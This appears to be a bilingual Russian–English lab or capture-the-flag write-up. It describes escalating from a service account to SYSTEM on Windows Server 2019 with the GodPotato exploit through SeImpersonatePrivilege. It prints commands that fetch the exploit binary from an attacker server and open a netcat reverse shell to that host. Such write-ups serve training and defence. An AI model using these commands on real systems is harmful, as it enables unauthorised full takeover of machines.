сверху представлен русский перевод а снизу представлен английский перевод/The Russian translation is shown above, and the English translation is shown below.
RU
______________________________________________________________________________
Эскалация привилегий в Windows: Путь “Божественной картошки” (GodPotato)
В ходе пентеста Windows AD мы столкнулись с типичной конфигурацией Windows Server 2019. Имея начальный доступ под учетной записью enterprise-security, нашей целью было локальное повышение прав до уровня системного администратора.
1. Точка входа: Анализ привилегий
После получения первичного реверс-шелла первым
делом была проверена конфигурация прав текущего юзера командой
whoami /priv.
Ключевым фактором успеха стало наличие SeImpersonatePrivilege в состоянии Enabled.
Эта привилегия позволяет процессу выдавать себя за другого пользователя (имперсонировать его),
если тот аутентифицировался в нашей сессии. Исторически это открывает дверь для атак семейства “Potato”
2. Почему именно GodPotato?
На современных системах (Windows 10, Server 2019/2022) старые эксплойты вроде *JuicyPotato* не работают, так как
Microsoft закрыла возможность взаимодействия с портом 135 для локальных учетных записей.
GodPotato обходит эти ограничения, используя особенности протокола DCOM и RPC.
Техническое обоснование (Under the Hood):1. Злоупотребление RPC: Эксплойт заставляет системную службу RPCSS (работающую от имени SYSTEM) аутентифицироваться на локальном именованном канале (named pipe), который контролирует злоумышленник.
2. Перехват токена: Когда служба подключается к каналу, GodPotato использует SeImpersonatePrivilege, чтобы “украсть” токен этой службы.
3. Создание процесса: Получив токен SYSTEM, эксплойт вызывает функцию CreateProcessAsUser или CreateProcessWithTokenW, запуская любую нашу команду (например, `nc.exe`) с наивысшими правами.
3. Процесс эксплуатации
Шаг 1: Доставка инструмента
Поскольку прямой доступ к файловой системе ограничен, мы использовали командлет PowerShell для загрузки скомпилированного бинарника GodPotato с нашего атакующего сервера Kali на котором заведомо подняли python http сервер:
COMMAND
______________________________________________________
iwr -uri http://192.168.154.253/GodPotato-Net4.exe -OutFile gp.exe
______________________________________________________
Шаг 2: Проверка “пробива”
Запуск gp.exe -cmd "whoami" подтвердил успешную подмену токена. В логах эксплойта мы увидели:
* CurrentUser: NT AUTHORITY\SYSTEM — токен успешно перехвачен.
* process start with pid XXXX — команда выполнена от имени системы.
Шаг 3: Получение интерактивного SYSTEM-шелла
Для удобства работы был использован nc.exe(неткат).
Мы запустили его через GodPotato, пробросив обратное соединение на порт 9001 нашей Kali:
COMMAND
______________________________________________________
.\gp.exe -cmd "C:\...\nc.exe 192.168.154.253 9001 -e cmd"
______________________________________________________
4. Захват флага (Looting)
Став пользователем SYSTEM, мы получили доступ к рабочему столу Администратора.
Результат:
* Файл: C:\Users\Administrator\Desktop\system.txt.
получаеться если видим что у пользователя есть привилегия SeImpersonatePrivilege,
то можем начинать вертикальную эскалацию до админа через семейство атак картошки.
EU
___________________________________________________
Privilege Escalation in Windows: The Path of the "Divine Potato" (GodPotato)
During a Windows AD pentest, we encountered a typical Windows Server 2019 configuration.
With initial access under the enterprise-security account, our goal was to locally elevate privileges to the system administrator level.
1. Entry Point: Privilege Analysis
After obtaining the initial reverse shell, the first step was to check the current user's privilege configuration using the whoami /priv command.
The key to success was the presence of SeImpersonatePrivilege in the Enabled state. This privilege allows a process to impersonate another user if that user is authenticated in our session.
Historically, this opens the door to attacks from the "Potato" family.
2. Why GodPotato?
On modern systems (Windows 10, Server 2019/2022), old exploits like *JuicyPotato* don't work because Microsoft has blocked communication with port 135 for local accounts.
GodPotato bypasses these restrictions by exploiting the DCOM and RPC protocols.
Technical Rationale (Under the Hood):
1. RPC Abuse: The exploit forces the RPCSS system service (running as SYSTEM) to authenticate on a local named pipe controlled by the attacker.
2. Token Hijacking: When the service connects to the pipe, GodPotato uses SeImpersonatePrivilege to steal the service's token.
3. Process Creation: After receiving the SYSTEM token, the exploit calls the CreateProcessAsUser or CreateProcessWithTokenW function,
unning any of our commands
(e.g., nc.exe) with the highest privileges.
3. Operation process
Step 1: Tool Delivery
Since direct file system access is restricted, we used a PowerShell cmdlet
to download the compiled GodPotato binary from our Kali attack server,
on which we had knowingly set up a Python HTTP server:
COMMAND
______________________________________________________
iwr -uri http://192.168.154.253/GodPotato-Net4.exe -OutFile gp.exe
______________________________________________________
Step 2: Checking the “Punch”
Running gp.exe -cmd "whoami" confirmed successful token spoofing. The exploit logs showed:
* CurrentUser: NT AUTHORITY\SYSTEM — token successfully intercepted.
* process start with pid XXXX — command executed on behalf of the system.
Step 3: Obtaining an interactive SYSTEM shell
For ease of use, we used nc.exe (netcat).
We ran it through GodPotato, forwarding a reverse connection to port 9001 in our Kali:
COMMAND
______________________________________________________
.\gp.exe -cmd "C:\...\nc.exe 192.168.154.253 9001 -e cmd"
______________________________________________________
4. Capturing the Flag (Looting)
By becoming the SYSTEM user, we gained access to the Administrator's desktop.
Result:
* File: C:\Users\Administrator\Desktop\system.txt
It turns out that if we see that the user has the SeImpersonatePrivilege privilege,
then we can begin vertical escalation to the admin via the potato family of attacks.
